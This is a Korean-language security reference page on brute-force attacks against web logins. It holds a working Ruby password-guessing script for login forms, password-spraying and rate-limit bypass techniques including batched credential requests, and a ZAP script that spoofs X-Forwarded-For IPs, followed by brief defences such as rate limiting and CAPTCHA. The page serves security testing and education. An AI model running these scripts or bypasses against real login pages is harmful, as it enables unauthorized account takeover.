Brute Force

๐Ÿ” Introduction

Brute Force ๊ณต๊ฒฉ์€ ์ง€์ •๋œ wordlist ๋˜๋Š” ๋ฌธ์ž ํŒจํ„ด์„ ๊ธฐ๋ฐ˜์œผ๋กœ ๋ฐ˜๋ณต์ ์ธ ์›น ์š”์ฒญ์„ ๋ฐœ์ƒ์‹œ์ผœ ๋ณด์•ˆ์ ์ธ ๋ฌธ์ œ๋ฅผ ๋งŒ๋“ค์–ด๋‚ด๋Š” ๊ณต๊ฒฉ ๊ธฐ๋ฒ•์ž…๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ฐœ๋…์€ Fuzzing๊ณผ ์œ ์‚ฌํ•˜๋‚˜ Fuzzing์€ ์ž˜๋ชป๋œ ํ˜•์‹์„ ๋ฐ์ดํ„ฐ๋ฅผ ๋ณด๋‚ด ์„œ๋น„์Šค์˜ ๊ฒฐํ•จ์„ ์œ ๋„ํ•œ๋‹ค๋ฉด, Brute force๋Š” Password์— ๋Œ€ํ•œ ๊ณต๊ฒฉ๊ณผ ๊ฐ™์ด ํ—ˆ์šฉ๋œ ๊ฐ’์„ ์ฐพ๊ธฐ ์œ„ํ•ด ๋‹ค์ˆ˜์˜ ๋ฐ์ดํ„ฐ๋ฅผ ๋ณด๋‚ด๋Š” ๋ฐฉ์‹์ž…๋‹ˆ๋‹ค.

์•”ํ˜ธํ•™์—์„  ํŠน์ •ํ•œ ์•”ํ˜ธ๋ฅผ ํ’€๊ธฐ ์œ„ํ•ด ๊ฐ€๋Šฅํ•œ ๋ชจ๋“  ๊ฐ’์„ ๋Œ€์ž…ํ•˜๋Š” ๊ฒƒ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Testing method

Brute force๋Š” ๋ณดํ†ต brute force ๋˜๋Š” fuzzer๋ฅผ ์ด์šฉํ•˜๊ฑฐ๋‚˜ ๋”ฐ๋กœ ์Šคํฌ๋ฆฝํŒ…ํ•˜์—ฌ ํ…Œ์ŠคํŠธํ•ฉ๋‹ˆ๋‹ค.

Wordlists

Wordlist๋กœ ๊ฐ€์žฅ ๋งŽ์ด ์‚ฌ์šฉ๋˜๋Š” ๋Œ€ํ‘œ์ ์ธ ์ €์žฅ์†Œ๊ฐ€ SecLists์ž…๋‹ˆ๋‹ค.

Fuzzer

Scripting

์•„๋ž˜๋Š” form์„ ๋Œ€์ƒ์œผ๋กœํ•œ Ruby script์ž…๋‹ˆ๋‹ค.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
require 'rubygems'
require 'mechanize'

passwordlist = File.open("passwords.txt")
agent = Mechanize.new{|a| 
    a.verify_mode = OpenSSL::SSL::VERIFY_NONE
    }
target = ARGV[0]
user = ARGV[1]

passwordlist.each do |password|
    page  = agent.get target
    form          = page.form_with :id => 'login-form'
    form.username = user
    form.passwd   = password.chomp
    result = form.submit
    if result.body =~ /"success" : true/ 
        puts "SUCCESS #{user}/#{password}"
    end
end

Bypass protection

Password Spraying

๋งŒ์•ฝ ๋กœ๊ทธ์ธ ํŽ˜์ด์ง€ ๋“ฑ์—์„œ ๊ฐ ๊ณ„์ •๋ณ„๋กœ Brute force์— ๋Œ€ํ•œ ๋Œ€์‘ ๋กœ์ง์ด ์žˆ๋Š” ๊ฒฝ์šฐ ๋ฐ˜๋Œ€๋กœ ํŒจ์Šค์›Œ๋“œ๋ฅผ ๊ณ ์ •ํ•˜๊ณ , User list๋ฅผ ์ด์šฉํ•˜์—ฌ Brute force๋ฅผ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ํ˜•ํƒœ๋Š” ๊ด€๋ฆฌ์ž๊ฐ€ ์‹ ๊ทœ ๊ณ„์ •์— ๋Œ€ํ•ด ํŒจ์Šค์›Œ๋“œ๋ฅผ ๊ณ ์ •ํ•ด์„œ ์ƒ์„ฑํ•˜๋Š” ์„œ๋น„์Šค์—์„œ ์œ ์šฉํ•˜๋ฉฐ ID ๊ธฐ๋ฐ˜์˜ ๋ณดํ˜ธ ์ •์ฑ…์„ ๋ฌด์‹œํ•˜๋ฉด์„œ ๋‹ค์ˆ˜์˜ ์š”์ฒญ์„ ๋ณด๋‚ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

  • ID: admin, qateam, infrateam …. something
  • PW: default_password

Bypass rate limit (slow scan)

Brute Force์— ๋Œ€ํ•œ ๋Œ€์‘์ธ Rate limit์€ ๊ธฐ๋Šฅ์„ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋Š” ์‹œ๊ฐ„ ๋˜๋Š” ๊ฐฏ์ˆ˜๋ฅผ ๋ช…์‹œํ•˜๋Š” ํ˜•ํƒœ์˜ ๋Œ€์‘ ๋ฐฉ์•ˆ์ž…๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ ํ…Œ์ŠคํŒ…์„ ํ†ตํ•ด ์‹œ๊ฐ„/Req์˜ ๊ฐ„๊ฒฉ์„ ์œ ์ถ”ํ•œ ํ›„ ์ ๋‹นํ•œ Delay๋ฅผ ์ฃผ์–ด limit ๊ฑธ๋ฆฌ์ง€ ์•Š๊ณ  Brute Force๋ฅผ ์ง„ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

1
2
3
4
for _,password := range passwords
    r := SendReq(user,password)
    Sleep(1)
}

Bypass rate limit (many req)

์„œ๋น„์Šค๊ฐ€ ์—ฌ๋Ÿฌ Hop์œผ๋กœ ๊ตฌ์„ฑ๋˜๊ณ  ํŠน์ • ๊ตฌ๊ฐ„์—์„œ Rate limit์ด ์กด์žฌํ•˜๋Š” ๊ฒฝ์šฐ ์•„์ฃผ ๋‹จ์‹œ๊ฐ„์— ์—„์ฒญ๋‚˜๊ฒŒ ๋งŽ์€ Request๋ฅผ ์ƒ์„ฑํ•˜๊ณ  ๋™์‹œ์— ์ „์†กํ•˜์—ฌ Rate limit์œผ๋กœ ์ œํ•œ๋˜๊ธฐ ์ „ ์ตœ๋Œ€ํ•œ ๋งŽ์€ Req๋ฅผ ์ œํ•œ ๊ตฌ์—ญ ๋’ค๋กœ ๋„˜๊ธฐ๋Š” ํ˜•ํƒœ์˜ ์šฐํšŒ ๋ฐฉ๋ฒ•๋„ ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ํ˜•ํƒœ์˜ ๋ฐฉ๋ฒ•์€ ์ผ๋ฐ˜์ ์ธ Fuzzer๋กœ๋Š” ์–ด๋ ต๊ณ , ๋™์‹œ์„ฑ ์ฒ˜๋ฆฌ๊ฐ€ ๊ฐ€๋Šฅํ•˜๋„๋ก ์ง์ ‘ ๊ตฌํ˜„ํ•œ ์ฝ”๋“œ ๋˜๋Š” ํ™˜๊ฒฝ์ด๋‚˜ Burpsuite์˜ Turbo Intruder๋กœ ํ…Œ์ŠคํŒ…ํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

๊ฐ„๋‹จํ•œ ๋ฐฉ๋ฒ•์„ ํ•˜๋‚˜ ์†Œ๊ฐœํ•˜์ž๋ฉด ๋จผ์ € Req ํ๋ฆ„์„ ์•„๋ž˜์™€ ๊ฐ™์ด ๊ตฌ์„ฑํ•ฉ๋‹ˆ๋‹ค.

Client -> GW -> Target server

์ดํ›„ GW์—์„œ ์š”์ฒญ์„ ์žก์•„ ์ „์†กํ•˜์ง€ ์•Š๊ณ  ๋“ค๊ณ  ์žˆ๋‹ค๊ฐ€ ํŠน์ • ๊ฐฏ์ˆ˜๋งŒํผ ์Œ“์ด๋ฉด ํ•œ๋ฒˆ์— ๋†“์•„ ์ „์†กํ•˜๋Š” ํ˜•ํƒœ๋กœ ๊ตฌ์„ฑํ•ด๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฐ ๊ฒฝ์šฐ Client์—์„œ Request๋ฅผ ์ƒ์„ฑํ•˜๊ณ  ์ „๋‹ฌํ•˜๊ธฐ ์œ„ํ•ด ์†Œ์š”๋˜๋Š” ์‹œ๊ฐ„์„ ์•„๋‚„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

  1. Req * 100000 ์ƒ์„ฑ ๋ฐ ์ˆœ์ฐจ ์ „์†ก
  2. GW์—์„œ ๋ชจ๋“  ์š”์ฒญ์„ ์žก์•„๋‘๊ณ  ์žˆ์Œ
  3. ํŠน์ • ์กฐ๊ฑด์ด๋‚˜ ๊ณต๊ฒฉ์ž์˜ trigger์— ์˜ํ•ด GW์—์„œ ๋™์‹œ์— ๋†“์•„ ์ „์†ก
  4. ๋Œ€์ƒ ์„œ๋ฒ„์—๋Š” ๋‹จ์‹œ๊ฐ„์— ๋งŽ์€ Request์— ๋™์‹œ์— ๋ฐœ์ƒํ•˜๊ฒŒ ๋จ

Bypass rate limit (big query)

๋•Œ๋•Œ๋กœ ์„œ๋น„์Šค์—์„œ Array ํ˜•ํƒœ์˜ Arguments๋ฅผ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ ์—ฌ๋Ÿฌ๊ฐœ์˜ Login ์ •๋ณด๋ฅผ ๋‹ด์€ ํฐ Request๋ฅผ ์ „์†กํ•˜์—ฌ ํ•œ๋ฒˆ์˜ Request์— ๋งŽ์€ ํ…Œ์ŠคํŠธ๋ฅผ ์ˆ˜ํ–‰ํ•˜๋„๋ก ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

1
2
3
POST /login HTTP/1.1

id[0]=user&password[0]=1&id[1]=user&password[1]=2&id[2]=user&password[2]=3

Bypass IP Check

๋กœ๊ทธ์ธ ํŽ˜์ด์ง€ ๋“ฑ์—์„  ์‚ฌ์šฉ์ž์˜ ์„ธ์…˜์„ ์‹๋ณ„ํ•  ์ˆ˜ ์—†๊ธฐ ๋•Œ๋ฌธ์— ๋ณดํ†ต IP ๊ธฐ๋ฐ˜์œผ๋กœ ์ œํ•œํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ ์ง์ ‘ IP๋ฅผ Rotate ์‹œํ‚ค๊ฑฐ๋‚˜ X-Forwarded-For ๋“ฑ IP๋ฅผ ์†์ผ ์ˆ˜ ์žˆ๋Š” ํ—ค๋”๋ฅผ ์ด์šฉํ•˜์—ฌ ์šฐํšŒ๋ฅผ ์‹œ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์•„๋ž˜๋Š” ZAP Fuzzer์—์„œ Random IP ๊ธฐ๋ฐ˜์œผ๋กœ X-Forwarded-For๋ฅผ ์ƒ์„ฑํ•˜๋Š” ์Šคํฌ๋ฆฝํŠธ์ž…๋‹ˆ๋‹ค. ์ž์„ธํ•œ ๋‚ด์šฉ์€ Random IP in X-Forwarded-For in ZAP ๊ธ€์„ ์ฐธ๊ณ ํ•ด์ฃผ์„ธ์š”!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
function processMessage(utils, message) {
  // ๋žœ๋ค์œผ๋กœ IP ํฌ๋งท์˜ ๊ฐ’์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.
	var random_ip = Math.floor(Math.random() * 254)+ "." + Math.floor(Math.random() * 254) + "." + Math.floor(Math.random() * 254) + "." + Math.floor(Math.random() * 254);
	// Fuzzing์˜ Request๊ฐ€ ์ „์†ก๋˜๊ธฐ ์ „ X-Forwarded-For ํ—ค๋”์— ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค.
	message.getRequestHeader().setHeader("X-Forwarded-For", random_ip);
}

function processResult(utils, fuzzResult){
	return true;
}

function getRequiredParamsNames(){
	return [];
}

function getOptionalParamsNames(){
	return [];
}

๐Ÿ›ก Defensive techniques

Rate limit

Brute Force์— ๋Œ€ํ•œ ๋Œ€์‘๋ฐฉ์•ˆ์œผ๋กœ ์‹œ๊ฐ„/Req ๋‹จ์œ„๋กœ limit์„ ๊ฑธ์–ด ๋ฐ˜๋ณต ์š”์ฒญ์˜ ํ—ˆ๋“ค์„ ๋†’์ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค๋งŒ ๊ณต๊ฒฉ์ž๊ฐ€ ์กฐ๊ฑด์„ ํŒŒ์•…ํ•˜๋Š” ๊ฒฝ์šฐ ์šฐํšŒํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐฉ๋ฒ•์„ ๋งŒ๋“ค ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์—ฌ๋Ÿฌ๊ฐ€์ง€ ๋ณด์•ˆ ๋กœ์ง์„ ๋™์‹œ์— ์ ์šฉํ•˜์—ฌ ํ—ˆ๋“ค์„ ๋†’์ด๋Š” ๋ฐฉ๋ฒ•์ด ์ข‹์Šต๋‹ˆ๋‹ค.

  • x ํšŒ ์ด์ƒ ์‹คํŒจ ์‹œ IP ์ œํ•œ (ํŠน์ • ์‹œ๊ฐ„ ๊ธฐ๋‹ค๋ฆฌ๊ฑฐ๋‚˜ ๊ด€๋ฆฌ์ž ๋ฌธ์˜๋กœ ํ•ด์†Œ๋˜๋„๋ก)
  • x ์ดˆ ๋‚ด x ํšŒ ์ด์ƒ ์š”์ฒญ ์‹œ IP ์ œํ•œ
  • x ํšŒ ์ด์ƒ ์š”์ฒญ ์‹œ IP ์ œํ•œ
  • 1ํšŒ ์š”์ฒญ ํ›„ x ์ดˆ์˜ delay๋ฅผ ๊ฐ€์ง€๋„๋ก ๊ตฌํ˜„
  • ๋“ฑ ์ œํ•œํ•  ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“  ๋ฐฉ๋ฒ•

Captcha

Captcha ๋˜ํ•œ Brute Force์— ๋Œ€ํ•œ ์ข‹์€ ์™„ํ™” ๋ฐฉ๋ฒ• ์ค‘ ํ•˜๋‚˜์ž…๋‹ˆ๋‹ค. IP๋‚˜ Sessions ๋“ฑ์— ํŠน์ • ํšŸ์ˆ˜ ์ด์ƒ ์š”์ฒญ์ด ๋ฐœ์ƒํ•˜๊ฑฐ๋‚˜, ๋˜๋Š” ์ค‘์š” ๊ธฐ๋Šฅ์ธ ๊ฒฝ์šฐ ๋ฌด์กฐ๊ฑด captcha๋ฅผ ์š”๊ตฌํ•˜์—ฌ ์ž๋™ํ™”๋œ ๋„๊ตฌ๋กœ ๋ฐ˜๋ณต ์š”์ฒญ์„ ํ•  ์ˆ˜ ์—†๋„๋ก ์ œํ•œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๐Ÿ•น Tools

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0